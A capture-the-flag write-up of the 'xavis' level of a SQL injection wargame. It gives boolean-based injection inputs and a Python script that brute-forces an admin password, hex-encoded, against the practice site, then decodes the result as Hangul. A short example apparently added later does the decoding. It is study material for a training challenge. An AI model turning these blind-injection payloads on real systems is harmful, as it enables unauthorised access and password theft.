[LOS] Xavis Solution (19)

🌧: 2020. 12. 10.

This is the "xavis" problem, which turned out to be extremely tricky.

When I first saw it, it looked far too easy for its level, so I assumed it was a breather, but the answer simply would not come out.

 

I made the query evaluate to "true", inferred the password length and found it to be 12, and then, as before, ran ASCII codes through Burp Suite to substitute values one at a time. No value came out at all, and the run overloaded and stopped midway.

 

I could not work out the author's intent, not even how to approach the problem, so I started by looking at the hints.

Hints

1. The password is not made of digits, letters or special characters
2. Do not output it as ASCII codes; output it in "hex" form
3. Decode the resulting "hex" value back to its original text

 

Input Code

' or length(hex(pw))='24
' or length(substr(pw,1,1))='4

 

Converting pw to hex and checking its length gave "24", and the length of the first password character alone is a whopping "4".

The answer is 3 characters long, yet each password character takes up 4 bytes. You can put this down to "hex" working in 8-bit units: every byte becomes two hex digits, so 24 hex digits are 12 bytes, or 4 bytes for each of the 3 characters.

 

This time the range of values to check is large, so the output has to be produced with Python rather than Burp Suite.

 

# -*- coding: utf-8 -*-
import requests
from prettytable import PrettyTable

x = PrettyTable()
x.field_names = ["password"]

cookies = {"PHPSESSID": "ah35rn49pvpac6k519qikbnpcn"}
# Candidate characters; hex(pw) can only ever contain 0-9 and a-f
charset = "0123456789abcdefghijklmnopqrstuvwxyz"
pw = ""

# length(hex(pw)) is 24, so walk positions 1..24
for j in range(1, 25):
    for i in charset:
        url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?" \
              "pw=' or id='admin' and substr(hex(pw),{0},1)='{1}'%23".format(j, i)
        response = requests.get(url, cookies=cookies)

        # "Hello admin" in the response means the guess for position j was true
        if "Hello admin" in response.text:
            pw = pw + i
            # Add the row first, then print, so the table shows the latest value
            x.add_row([pw])
            print(x)
            break
 

This is admin's hex(password), in hexadecimal form, as recovered by the code above. Since each password character occupies 4 bytes, splitting the string into per-character groups and dropping the leading zeros gives: 0000c6b00000c6550000ad73  -->  c6b0 c655 ad73.

 

Now all that is left is to convert the hex code back into Hangul.
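The final decoding step, together with the length observations from earlier in the post, as an added example that is not part of the original post. It assumes the column stores fixed-width 4-byte big-endian code points (UTF-32), which is what the 0000c6b0 grouping suggests; the function names are hypothetical.

```python
# Added example: explain the measured lengths and decode the recovered value.
# Assumption: pw is stored as 4-byte big-endian code points (UTF-32).

HEX_PW = "0000c6b00000c6550000ad73"  # value recovered on this page
BYTES_PER_CHAR = 4                   # from length(substr(pw,1,1)) = 4


def split_code_units(hex_str, width=BYTES_PER_CHAR):
    """Split a hex dump into one integer code point per fixed-width character."""
    raw = bytes.fromhex(hex_str)  # raises ValueError on odd-length or invalid hex
    if len(raw) % width:
        raise ValueError("byte length %d is not a multiple of %d" % (len(raw), width))
    return [int.from_bytes(raw[i:i + width], "big") for i in range(0, len(raw), width)]


def decode_password(hex_str, width=BYTES_PER_CHAR):
    """Map each code point back to its character, rejecting invalid values."""
    chars = []
    for cp in split_code_units(hex_str, width):
        if cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
            raise ValueError("not a Unicode scalar value: %#x" % cp)
        chars.append(chr(cp))
    return "".join(chars)


def ascii_guessable(hex_str, width=BYTES_PER_CHAR):
    """True only if every character is printable ASCII, as the first attempt assumed."""
    return all(0x20 <= cp <= 0x7E for cp in split_code_units(hex_str, width))


if __name__ == "__main__":
    raw = bytes.fromhex(HEX_PW)
    print("length(hex(pw)) =", len(HEX_PW))
    print("length(pw)      =", len(raw))
    print("characters      =", len(raw) // BYTES_PER_CHAR)
    print("code points     =", [format(cp, "04x") for cp in split_code_units(HEX_PW)])
    print("ASCII guessable =", ascii_guessable(HEX_PW))
    print("password        =", decode_password(HEX_PW))
```

Because no character falls in the printable ASCII range, a character-by-character ASCII comparison can never match, which is why the Burp Suite run returned nothing.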

 
